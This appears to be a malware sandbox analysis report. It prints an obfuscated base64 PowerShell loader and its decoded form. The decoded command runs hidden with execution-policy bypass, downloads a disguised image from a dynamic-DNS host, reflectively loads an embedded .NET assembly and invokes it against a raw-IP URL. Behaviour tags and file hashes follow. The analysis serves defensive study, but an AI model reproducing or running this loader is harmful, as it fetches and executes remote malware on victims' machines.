⦦ ⼀HI㆛ ⺞ ⏬ ⦦ ⼀d㆛ ⺞ ⏬ ⦦ ⼀BG㆛ ⺞ ⏬ ⦦ ⼀Gw㆛ ⺞ ⏬ ⦦ ⼀YQBn㆛ ⺞ ⏬ ⦦ ⼀Ck㆛ ⺞ ⏬ ⦦ ⼀Ow㆛ ⺞ ⏬ ⦦ ⼀g㆛ ⺞ ⏬ ⦦ ⼀CQ㆛ ⺞ ⏬ ⦦ ⼀ZQBu㆛ ⺞ ⏬ ⦦ ⼀GQ㆛ ⺞ ⏬ ⦦ ⼀SQBu㆛ ⺞ ⏬ ⦦ ⼀GQ㆛ ⺞ ⏬ ⦦ ⼀ZQB4㆛ ⺞ ⏬ ⦦ ⼀C㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀PQ㆛ ⺞ ⏬ ⦦ ⼀g㆛ ⺞ ⏬ ⦦ ⼀CQ㆛ ⺞ ⏬ ⦦ ⼀aQBt㆛ ⺞ ⏬ ⦦ ⼀GE㆛ ⺞ ⏬ ⦦ ⼀ZwBl㆛ ⺞ ⏬ ⦦ ⼀FQ㆛ ⺞ ⏬ ⦦ ⼀ZQB4㆛ ⺞ ⏬ ⦦ ⼀HQ㆛ ⺞ ⏬ ⦦ ⼀LgBJ㆛ ⺞ ⏬ ⦦ ⼀G4㆛ ⺞ ⏬ ⦦ ⼀Z㆛ ⺞ ⏬ ⦦ ⼀Bl㆛ ⺞ ⏬ ⦦ ⼀Hg㆛ ⺞ ⏬ ⦦ ⼀TwBm㆛ ⺞ ⏬ ⦦ ⼀Cg㆛ ⺞ ⏬ ⦦ ⼀J㆛ ⺞ ⏬ ⦦ ⼀Bl㆛ ⺞ ⏬ ⦦ ⼀G4㆛ ⺞ ⏬ ⦦ ⼀Z㆛ ⺞ ⏬ ⦦ ⼀BG㆛ ⺞ ⏬ ⦦ ⼀Gw㆛ ⺞ ⏬ ⦦ ⼀YQBn㆛ ⺞ ⏬ ⦦ ⼀Ck㆛ ⺞ ⏬ ⦦ ⼀Ow㆛ ⺞ ⏬ ⦦ ⼀g㆛ ⺞ ⏬ ⦦ ⼀Gk㆛ ⺞ ⏬ ⦦ ⼀Zg㆛ ⺞ ⏬ ⦦ ⼀g㆛ ⺞ ⏬ ⦦ ⼀Cg㆛ ⺞ ⏬ ⦦ ⼀J㆛ ⺞ ⏬ ⦦ ⼀Bz㆛ ⺞ ⏬ ⦦ ⼀HQ㆛ ⺞ ⏬ ⦦ ⼀YQBy㆛ ⺞ ⏬ ⦦ ⼀HQ㆛ ⺞ ⏬ ⦦ ⼀SQBu㆛ ⺞ ⏬ ⦦ ⼀GQ㆛ ⺞ ⏬ ⦦ ⼀ZQB4㆛ ⺞ ⏬ ⦦ ⼀C㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀LQBn㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀w㆛ ⺞ ⏬ ⦦ ⼀C㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀LQBh㆛ ⺞ ⏬ ⦦ ⼀G4㆛ ⺞ ⏬ ⦦ ⼀Z㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀g㆛ ⺞ ⏬ ⦦ ⼀CQ㆛ ⺞ ⏬ ⦦ ⼀ZQBu㆛ ⺞ ⏬ ⦦ ⼀GQ㆛ ⺞ ⏬ ⦦ ⼀SQBu㆛ ⺞ ⏬ ⦦ ⼀GQ㆛ ⺞ ⏬ ⦦ ⼀ZQB4㆛ ⺞ ⏬ ⦦ ⼀C㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀LQBn㆛ ⺞ ⏬ ⦦ ⼀HQ㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀k㆛ ⺞ ⏬ ⦦ ⼀HM㆛ ⺞ ⏬ ⦦ ⼀d㆛ ⺞ ⏬ ⦦ ⼀Bh㆛ ⺞ ⏬ ⦦ ⼀HI㆛ ⺞ ⏬ ⦦ ⼀d㆛ ⺞ ⏬ ⦦ ⼀BJ㆛ ⺞ ⏬ ⦦ ⼀G4㆛ ⺞ ⏬ ⦦ ⼀Z㆛ ⺞ ⏬ ⦦ ⼀Bl㆛ ⺞ ⏬ ⦦ ⼀Hg㆛ ⺞ ⏬ ⦦ ⼀KQ㆛ ⺞ ⏬ ⦦ ⼀g㆛ ⺞ ⏬ ⦦ ⼀Hs㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀k㆛ ⺞ ⏬ ⦦ ⼀HM㆛ ⺞ ⏬ ⦦ ⼀d㆛ ⺞ ⏬ ⦦ ⼀Bh㆛ ⺞ ⏬ ⦦ ⼀HI㆛ ⺞ ⏬ ⦦ ⼀d㆛ ⺞ ⏬ ⦦ ⼀BJ㆛ ⺞ ⏬ ⦦ ⼀G4㆛ ⺞ ⏬ ⦦ ⼀Z㆛ ⺞ ⏬ ⦦ ⼀Bl㆛ ⺞ ⏬ ⦦ ⼀Hg㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀r㆛ ⺞ ⏬ ⦦ ⼀D0㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀k㆛ ⺞ ⏬ ⦦ ⼀HM㆛ ⺞ ⏬ ⦦ ⼀d㆛ ⺞ ⏬ ⦦ ⼀Bh㆛ ⺞ ⏬ ⦦ ⼀HI㆛ ⺞ ⏬ ⦦ ⼀d㆛ ⺞ ⏬ ⦦ ⼀BG㆛ ⺞ ⏬ ⦦ ⼀Gw㆛ ⺞ ⏬ ⦦ ⼀YQBn㆛ ⺞ ⏬ ⦦ ⼀C4㆛ ⺞ ⏬ ⦦ ⼀T㆛ ⺞ ⏬ ⦦ ⼀Bl㆛ ⺞ ⏬ ⦦ ⼀G4㆛ ⺞ ⏬ ⦦ ⼀ZwB0㆛ ⺞ ⏬ ⦦ ⼀Gg㆛ ⺞ ⏬ ⦦ ⼀Ow㆛ ⺞ ⏬ ⦦ ⼀g㆛ ⺞ ⏬ ⦦ ⼀CQ㆛ ⺞ ⏬ ⦦ ⼀YgBh㆛ ⺞ ⏬ ⦦ ⼀HM㆛ ⺞ ⏬ ⦦ ⼀ZQ㆛ ⺞ ⏬ ⦦ ⼀2㆛ ⺞ ⏬ ⦦ ⼀DQ㆛ ⺞ ⏬ ⦦ ⼀T㆛ ⺞ ⏬ ⦦ ⼀Bl㆛ ⺞ ⏬ ⦦ ⼀G4㆛ ⺞ ⏬ ⦦ ⼀ZwB0㆛ ⺞ ⏬ ⦦ ⼀Gg㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀9㆛ ⺞ ⏬ ⦦ ⼀C㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀J㆛ ⺞ ⏬ ⦦ ⼀Bl㆛ ⺞ ⏬ ⦦ ⼀G4㆛ ⺞ ⏬ ⦦ ⼀Z㆛ ⺞ ⏬ ⦦ ⼀BJ㆛ ⺞ ⏬ ⦦ ⼀G4㆛ ⺞ ⏬ ⦦ ⼀Z㆛ ⺞ ⏬ ⦦ ⼀Bl㆛ ⺞ ⏬ ⦦ ⼀Hg㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀t㆛ ⺞ ⏬ ⦦ ⼀C㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀J㆛ ⺞ ⏬ ⦦ ⼀Bz㆛ ⺞ ⏬ ⦦ ⼀HQ㆛ ⺞ ⏬ ⦦ ⼀YQBy㆛ ⺞ ⏬ ⦦ ⼀HQ㆛ ⺞ ⏬ ⦦ ⼀SQBu㆛ ⺞ ⏬ ⦦ ⼀GQ㆛ ⺞ ⏬ ⦦ ⼀ZQB4㆛ ⺞ ⏬ ⦦ ⼀Ds㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀k㆛ ⺞ ⏬ ⦦ ⼀GI㆛ ⺞ ⏬ ⦦ ⼀YQBz㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀Ng㆛ ⺞ ⏬ ⦦ ⼀0㆛ ⺞ ⏬ ⦦ ⼀EM㆛ ⺞ ⏬ ⦦ ⼀bwBt㆛ ⺞ ⏬ ⦦ ⼀G0㆛ ⺞ ⏬ ⦦ ⼀YQBu㆛ ⺞ ⏬ ⦦ ⼀GQ㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀9㆛ ⺞ ⏬ ⦦ ⼀C㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀J㆛ ⺞ ⏬ ⦦ ⼀Bp㆛ ⺞ ⏬ ⦦ ⼀G0㆛ ⺞ ⏬ ⦦ ⼀YQBn㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀V㆛ ⺞ ⏬ ⦦ ⼀Bl㆛ ⺞ ⏬ ⦦ ⼀Hg㆛ ⺞ ⏬ ⦦ ⼀d㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀u㆛ ⺞ ⏬ ⦦ ⼀FM㆛ ⺞ ⏬ ⦦ ⼀dQBi㆛ ⺞ ⏬ ⦦ ⼀HM㆛ ⺞ ⏬ ⦦ ⼀d㆛ ⺞ ⏬ ⦦ ⼀By㆛ ⺞ ⏬ ⦦ ⼀Gk㆛ ⺞ ⏬ ⦦ ⼀bgBn㆛ ⺞ ⏬ ⦦ ⼀Cg㆛ ⺞ ⏬ ⦦ ⼀J㆛ ⺞ ⏬ ⦦ ⼀Bz㆛ ⺞ ⏬ ⦦ ⼀HQ㆛ ⺞ ⏬ ⦦ ⼀YQBy㆛ ⺞ ⏬ ⦦ ⼀HQ㆛ ⺞ ⏬ ⦦ ⼀SQBu㆛ ⺞ ⏬ ⦦ ⼀GQ㆛ ⺞ ⏬ ⦦ ⼀ZQB4㆛ ⺞ ⏬ ⦦ ⼀Cw㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀k㆛ ⺞ ⏬ ⦦ ⼀GI㆛ ⺞ ⏬ ⦦ ⼀YQBz㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀Ng㆛ ⺞ ⏬ ⦦ ⼀0㆛ ⺞ ⏬ ⦦ ⼀Ew㆛ ⺞ ⏬ ⦦ ⼀ZQBu㆛ ⺞ ⏬ ⦦ ⼀Gc㆛ ⺞ ⏬ ⦦ ⼀d㆛ ⺞ ⏬ ⦦ ⼀Bo㆛ ⺞ ⏬ ⦦ ⼀Ck㆛ ⺞ ⏬ ⦦ ⼀Ow㆛ ⺞ ⏬ ⦦ ⼀g㆛ ⺞ ⏬ ⦦ ⼀CQ㆛ ⺞ ⏬ ⦦ ⼀YwBv㆛ ⺞ ⏬ ⦦ ⼀G0㆛ ⺞ ⏬ ⦦ ⼀bQBh㆛ ⺞ ⏬ ⦦ ⼀G4㆛ ⺞ ⏬ ⦦ ⼀Z㆛ ⺞ ⏬ ⦦ ⼀BC㆛ ⺞ ⏬ ⦦ ⼀Hk㆛ ⺞ ⏬ ⦦ ⼀d㆛ ⺞ ⏬ ⦦ ⼀Bl㆛ ⺞ ⏬ ⦦ ⼀HM㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀9㆛ ⺞ ⏬ ⦦ ⼀C㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀WwBT㆛ ⺞ ⏬ ⦦ ⼀Hk㆛ ⺞ ⏬ ⦦ ⼀cwB0㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀bQ㆛ ⺞ ⏬ ⦦ ⼀u㆛ ⺞ ⏬ ⦦ ⼀EM㆛ ⺞ ⏬ ⦦ ⼀bwBu㆛ ⺞ ⏬ ⦦ ⼀HY㆛ ⺞ ⏬ ⦦ ⼀ZQBy㆛ ⺞ ⏬ ⦦ ⼀HQ㆛ ⺞ ⏬ ⦦ ⼀XQ㆛ ⺞ ⏬ ⦦ ⼀6㆛ ⺞ ⏬ ⦦ ⼀Do㆛ ⺞ ⏬ ⦦ ⼀RgBy㆛ ⺞ ⏬ ⦦ ⼀G8㆛ ⺞ ⏬ ⦦ ⼀bQBC㆛ ⺞ ⏬ ⦦ ⼀GE㆛ ⺞ ⏬ ⦦ ⼀cwBl㆛ ⺞ ⏬ ⦦ ⼀DY㆛ ⺞ ⏬ ⦦ ⼀N㆛ ⺞ ⏬ ⦦ ⼀BT㆛ ⺞ ⏬ ⦦ ⼀HQ㆛ ⺞ ⏬ ⦦ ⼀cgBp㆛ ⺞ ⏬ ⦦ ⼀G4㆛ ⺞ ⏬ ⦦ ⼀Zw㆛ ⺞ ⏬ ⦦ ⼀o㆛ ⺞ ⏬ ⦦ ⼀CQ㆛ ⺞ ⏬ ⦦ ⼀YgBh㆛ ⺞ ⏬ ⦦ ⼀HM㆛ ⺞ ⏬ ⦦ ⼀ZQ㆛ ⺞ ⏬ ⦦ ⼀2㆛ ⺞ ⏬ ⦦ ⼀DQ㆛ ⺞ ⏬ ⦦ ⼀QwBv㆛ ⺞ ⏬ ⦦ ⼀G0㆛ ⺞ ⏬ ⦦ ⼀bQBh㆛ ⺞ ⏬ ⦦ ⼀G4㆛ ⺞ ⏬ ⦦ ⼀Z㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀p㆛ ⺞ ⏬ ⦦ ⼀Ds㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀k㆛ ⺞ ⏬ ⦦ ⼀Gw㆛ ⺞ ⏬ ⦦ ⼀bwBh㆛ ⺞ ⏬ ⦦ ⼀GQ㆛ ⺞ ⏬ ⦦ ⼀ZQBk㆛ ⺞ ⏬ ⦦ ⼀EE㆛ ⺞ ⏬ ⦦ ⼀cwBz㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀bQBi㆛ ⺞ ⏬ ⦦ ⼀Gw㆛ ⺞ ⏬ ⦦ ⼀eQ㆛ ⺞ ⏬ ⦦ ⼀g㆛ ⺞ ⏬ ⦦ ⼀D0㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀Bb㆛ ⺞ ⏬ ⦦ ⼀FM㆛ ⺞ ⏬ ⦦ ⼀eQBz㆛ ⺞ ⏬ ⦦ ⼀HQ㆛ ⺞ ⏬ ⦦ ⼀ZQBt㆛ ⺞ ⏬ ⦦ ⼀C4㆛ ⺞ ⏬ ⦦ ⼀UgBl㆛ ⺞ ⏬ ⦦ ⼀GY㆛ ⺞ ⏬ ⦦ ⼀b㆛ ⺞ ⏬ ⦦ ⼀Bl㆛ ⺞ ⏬ ⦦ ⼀GM㆛ ⺞ ⏬ ⦦ ⼀d㆛ ⺞ ⏬ ⦦ ⼀Bp㆛ ⺞ ⏬ ⦦ ⼀G8㆛ ⺞ ⏬ ⦦ ⼀bg㆛ ⺞ ⏬ ⦦ ⼀u㆛ ⺞ ⏬ ⦦ ⼀EE㆛ ⺞ ⏬ ⦦ ⼀cwBz㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀bQBi㆛ ⺞ ⏬ ⦦ ⼀Gw㆛ ⺞ ⏬ ⦦ ⼀eQBd㆛ ⺞ ⏬ ⦦ ⼀Do㆛ ⺞ ⏬ ⦦ ⼀OgBM㆛ ⺞ ⏬ ⦦ ⼀G8㆛ ⺞ ⏬ ⦦ ⼀YQBk㆛ ⺞ ⏬ ⦦ ⼀Cg㆛ ⺞ ⏬ ⦦ ⼀J㆛ ⺞ ⏬ ⦦ ⼀Bj㆛ ⺞ ⏬ ⦦ ⼀G8㆛ ⺞ ⏬ ⦦ ⼀bQBt㆛ ⺞ ⏬ ⦦ ⼀GE㆛ ⺞ ⏬ ⦦ ⼀bgBk㆛ ⺞ ⏬ ⦦ ⼀EI㆛ ⺞ ⏬ ⦦ ⼀eQB0㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀cw㆛ ⺞ ⏬ ⦦ ⼀p㆛ ⺞ ⏬ ⦦ ⼀Ds㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀k㆛ ⺞ ⏬ ⦦ ⼀HQ㆛ ⺞ ⏬ ⦦ ⼀eQBw㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀9㆛ ⺞ ⏬ ⦦ ⼀C㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀J㆛ ⺞ ⏬ ⦦ ⼀Bs㆛ ⺞ ⏬ ⦦ ⼀G8㆛ ⺞ ⏬ ⦦ ⼀YQBk㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀Z㆛ ⺞ ⏬ ⦦ ⼀BB㆛ ⺞ ⏬ ⦦ ⼀HM㆛ ⺞ ⏬ ⦦ ⼀cwBl㆛ ⺞ ⏬ ⦦ ⼀G0㆛ ⺞ ⏬ ⦦ ⼀YgBs㆛ ⺞ ⏬ ⦦ ⼀Hk㆛ ⺞ ⏬ ⦦ ⼀LgBH㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀d㆛ ⺞ ⏬ ⦦ ⼀BU㆛ ⺞ ⏬ ⦦ ⼀Hk㆛ ⺞ ⏬ ⦦ ⼀c㆛ ⺞ ⏬ ⦦ ⼀Bl㆛ ⺞ ⏬ ⦦ ⼀Cg㆛ ⺞ ⏬ ⦦ ⼀JwBk㆛ ⺞ ⏬ ⦦ ⼀G4㆛ ⺞ ⏬ ⦦ ⼀b㆛ ⺞ ⏬ ⦦ ⼀Bp㆛ ⺞ ⏬ ⦦ ⼀GI㆛ ⺞ ⏬ ⦦ ⼀LgBJ㆛ ⺞ ⏬ ⦦ ⼀E8㆛ ⺞ ⏬ ⦦ ⼀LgBI㆛ ⺞ ⏬ ⦦ ⼀G8㆛ ⺞ ⏬ ⦦ ⼀bQBl㆛ ⺞ ⏬ ⦦ ⼀Cc㆛ ⺞ ⏬ ⦦ ⼀KQ㆛ ⺞ ⏬ ⦦ ⼀7㆛ ⺞ ⏬ ⦦ ⼀C㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀J㆛ ⺞ ⏬ ⦦ ⼀Bt㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀d㆛ ⺞ ⏬ ⦦ ⼀Bo㆛ ⺞ ⏬ ⦦ ⼀G8㆛ ⺞ ⏬ ⦦ ⼀Z㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀g㆛ ⺞ ⏬ ⦦ ⼀D0㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀k㆛ ⺞ ⏬ ⦦ ⼀HQ㆛ ⺞ ⏬ ⦦ ⼀eQBw㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀LgBH㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀d㆛ ⺞ ⏬ ⦦ ⼀BN㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀d㆛ ⺞ ⏬ ⦦ ⼀Bo㆛ ⺞ ⏬ ⦦ ⼀G8㆛ ⺞ ⏬ ⦦ ⼀Z㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀o㆛ ⺞ ⏬ ⦦ ⼀Cc㆛ ⺞ ⏬ ⦦ ⼀VgBB㆛ ⺞ ⏬ ⦦ ⼀Ek㆛ ⺞ ⏬ ⦦ ⼀Jw㆛ ⺞ ⏬ ⦦ ⼀p㆛ ⺞ ⏬ ⦦ ⼀C4㆛ ⺞ ⏬ ⦦ ⼀SQBu㆛ ⺞ ⏬ ⦦ ⼀HY㆛ ⺞ ⏬ ⦦ ⼀bwBr㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀K㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀k㆛ ⺞ ⏬ ⦦ ⼀G4㆛ ⺞ ⏬ ⦦ ⼀dQBs㆛ ⺞ ⏬ ⦦ ⼀Gw㆛ ⺞ ⏬ ⦦ ⼀L㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀g㆛ ⺞ ⏬ ⦦ ⼀Fs㆛ ⺞ ⏬ ⦦ ⼀bwBi㆛ ⺞ ⏬ ⦦ ⼀Go㆛ ⺞ ⏬ ⦦ ⼀ZQBj㆛ ⺞ ⏬ ⦦ ⼀HQ㆛ ⺞ ⏬ ⦦ ⼀WwBd㆛ ⺞ ⏬ ⦦ ⼀F0㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀o㆛ ⺞ ⏬ ⦦ ⼀Cc㆛ ⺞ ⏬ ⦦ ⼀d㆛ ⺞ ⏬ ⦦ ⼀B4㆛ ⺞ ⏬ ⦦ ⼀HQ㆛ ⺞ ⏬ ⦦ ⼀LgBN㆛ ⺞ ⏬ ⦦ ⼀Es㆛ ⺞ ⏬ ⦦ ⼀TgBT㆛ ⺞ ⏬ ⦦ ⼀C8㆛ ⺞ ⏬ ⦦ ⼀M㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀y㆛ ⺞ ⏬ ⦦ ⼀C8㆛ ⺞ ⏬ ⦦ ⼀Nw㆛ ⺞ ⏬ ⦦ ⼀0㆛ ⺞ ⏬ ⦦ ⼀DE㆛ ⺞ ⏬ ⦦ ⼀Lg㆛ ⺞ ⏬ ⦦ ⼀5㆛ ⺞ ⏬ ⦦ ⼀D㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀MQ㆛ ⺞ ⏬ ⦦ ⼀u㆛ ⺞ ⏬ ⦦ ⼀DM㆛ ⺞ ⏬ ⦦ ⼀Lg㆛ ⺞ ⏬ ⦦ ⼀y㆛ ⺞ ⏬ ⦦ ⼀Dk㆛ ⺞ ⏬ ⦦ ⼀MQ㆛ ⺞ ⏬ ⦦ ⼀v㆛ ⺞ ⏬ ⦦ ⼀C8㆛ ⺞ ⏬ ⦦ ⼀OgBw㆛ ⺞ ⏬ ⦦ ⼀HQ㆛ ⺞ ⏬ ⦦ ⼀d㆛ ⺞ ⏬ ⦦ ⼀Bo㆛ ⺞ ⏬ ⦦ ⼀Cc㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀s㆛ ⺞ ⏬ ⦦ ⼀C㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀JwBk㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀cwBh㆛ ⺞ ⏬ ⦦ ⼀HQ㆛ ⺞ ⏬ ⦦ ⼀aQB2㆛ ⺞ ⏬ ⦦ ⼀GE㆛ ⺞ ⏬ ⦦ ⼀Z㆛ ⺞ ⏬ ⦦ ⼀Bv㆛ ⺞ ⏬ ⦦ ⼀Cc㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀s㆛ ⺞ ⏬ ⦦ ⼀C㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀JwBk㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀cwBh㆛ ⺞ ⏬ ⦦ ⼀HQ㆛ ⺞ ⏬ ⦦ ⼀aQB2㆛ ⺞ ⏬ ⦦ ⼀GE㆛ ⺞ ⏬ ⦦ ⼀Z㆛ ⺞ ⏬ ⦦ ⼀Bv㆛ ⺞ ⏬ ⦦ ⼀Cc㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀s㆛ ⺞ ⏬ ⦦ ⼀C㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀JwBk㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀cwBh㆛ ⺞ ⏬ ⦦ ⼀HQ㆛ ⺞ ⏬ ⦦ ⼀aQB2㆛ ⺞ ⏬ ⦦ ⼀GE㆛ ⺞ ⏬ ⦦ ⼀Z㆛ ⺞ ⏬ ⦦ ⼀Bv㆛ ⺞ ⏬ ⦦ ⼀Cc㆛ ⺞ ⏬ ⦦ ⼀L㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀n㆛ ⺞ ⏬ ⦦ ⼀FI㆛ ⺞ ⏬ ⦦ ⼀ZQBn㆛ ⺞ ⏬ ⦦ ⼀EE㆛ ⺞ ⏬ ⦦ ⼀cwBt㆛ ⺞ ⏬ ⦦ ⼀Cc㆛ ⺞ ⏬ ⦦ ⼀L㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀n㆛ ⺞ ⏬ ⦦ ⼀GQ㆛ ⺞ ⏬ ⦦ ⼀ZQBz㆛ ⺞ ⏬ ⦦ ⼀GE㆛ ⺞ ⏬ ⦦ ⼀d㆛ ⺞ ⏬ ⦦ ⼀Bp㆛ ⺞ ⏬ ⦦ ⼀HY㆛ ⺞ ⏬ ⦦ ⼀YQBk㆛ ⺞ ⏬ ⦦ ⼀G8㆛ ⺞ ⏬ ⦦ ⼀Jw㆛ ⺞ ⏬ ⦦ ⼀p㆛ ⺞ ⏬ ⦦ ⼀Ck㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀B9㆛ ⺞ ⏬ ⦦ ⼀C㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀fQ㆛ ⺞ ⏬ ⦦ ⼀=';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('㆛ ⺞ ⏬ ⦦ ⼀','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$link = 'http://servidorwindows.ddns.com.br/Files/vbs.jpeg'; $webClient = New-Object System.Net.WebClient; try { $downloadedData = $webClient.DownloadData($link) } catch { Write-Host 'Failed To download data from $link' -ForegroundColor Red; exit }; if ($downloadedData -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($downloadedData); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('dnlib.IO.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.MKNS/02/741.901.3.291//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm','desativado')) } }"6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
717B
MD5822467b728b7a66b081c91795373789a
SHA1d8f2f02e1eef62485a9feffd59ce837511749865
SHA256af2343382b88335eea72251ad84949e244ff54b6995063e24459a7216e9576b9
